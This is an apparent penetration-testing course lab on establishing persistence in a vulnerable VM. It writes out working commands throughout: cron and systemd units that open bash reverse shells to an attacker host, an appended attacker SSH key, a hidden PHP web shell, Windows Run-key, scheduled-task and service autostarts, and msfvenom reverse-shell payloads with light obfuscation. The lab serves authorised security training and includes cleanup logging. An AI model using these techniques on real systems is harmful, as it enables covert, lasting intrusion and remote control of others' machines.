Skip to content

Latest commit

 

History

History
137 lines (94 loc) · 3.67 KB

File metadata and controls

137 lines (94 loc) · 3.67 KB

Lab 33 — Establishing Persistence (cron, systemd, web shell)

Exam objective: 5.1 Persistence — scheduled tasks/cron, service creation, reverse/bind shell, backdoor (web shell, trojan), registry keys, C2.

In this lab you will plant four common Linux/Windows persistence mechanisms in a deliberately-vulnerable VM you control. Persistence is the heartbeat of the post-exploitation phase — every method below must be listed and removed during cleanup in Lab 37.

Target: any Linux box where you have root (Metasploitable3 or a docker container).


Step 1 — Cron job

echo '* * * * * root bash -c "bash -i >& /dev/tcp/<KALI>/4444 0>&1"' \
  | sudo tee /etc/cron.d/sysupdate

Catcher on Kali:

nc -lvnp 4444

A reverse shell will check in every minute.

User-level cron alternative:

(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.helper.sh") | crontab -

Step 2 — systemd service

sudo tee /etc/systemd/system/sys-helper.service <<'EOF'
[Unit]
Description=System Helper
After=network.target

[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/<KALI>/4444 0>&1"
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl daemon-reload
sudo systemctl enable --now sys-helper.service

Systemd survives reboots and auto-restarts — much stealthier than a one-shot cron.


Step 3 — Authorized SSH key

mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAA…  attacker@kali' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Survives password rotation. Defenders should monitor authorized_keys integrity.


Step 4 — Web shell

sudo tee /var/www/html/.cache.php <<'EOF'
<?php if (isset($_REQUEST['c'])) system($_REQUEST['c']); ?>
EOF
sudo chmod 644 /var/www/html/.cache.php

Triggers: curl http://target/.cache.php?c=id.

Use weevely for encrypted comms:

weevely generate Spring2026 /tmp/sh.php
# upload /tmp/sh.php to the doc root
weevely http://target/sh.php Spring2026

Step 5 — Windows persistence (overview)

Mechanism Command
Run-key autostart reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "C:\users\public\agent.exe"
Scheduled task schtasks /create /tn Updater /tr "C:\users\public\agent.exe" /sc onlogon /rl highest
Service sc create UpdaterSvc binPath= "C:\users\public\agent.exe" start= auto
WMI event sub via Invoke-CimInstance — see Atomic Red Team T1546.003
Startup folder drop .lnk into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

Step 6 — Generate a payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=<KALI> LPORT=4444 \
  -f exe -o agent.exe -e x64/xor -i 5

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=<KALI> LPORT=4444 \
  -f elf -o agent.elf

-e x64/xor -i 5 lightly obfuscates (modern EDR still spots it — use only in authorised lab work).


Step 7 — Document EVERY persistence artefact

Keep a persistence.log listing host, mechanism, file path, time:

2026-05-21 02:14  host=ms3prod  cron=/etc/cron.d/sysupdate
2026-05-21 02:18  host=ms3prod  systemd=/etc/systemd/system/sys-helper.service
2026-05-21 02:20  host=ms3prod  webshell=/var/www/html/.cache.php

This log feeds the cleanup checklist in Lab 37 — never leave persistence behind.


What you learned

  • Five practical Linux persistence mechanisms (cron, systemd, ssh key, web shell, registry-on-Win).
  • How msfvenom builds reverse-shell payloads in multiple formats.
  • Why every persistence artefact must be logged for cleanup.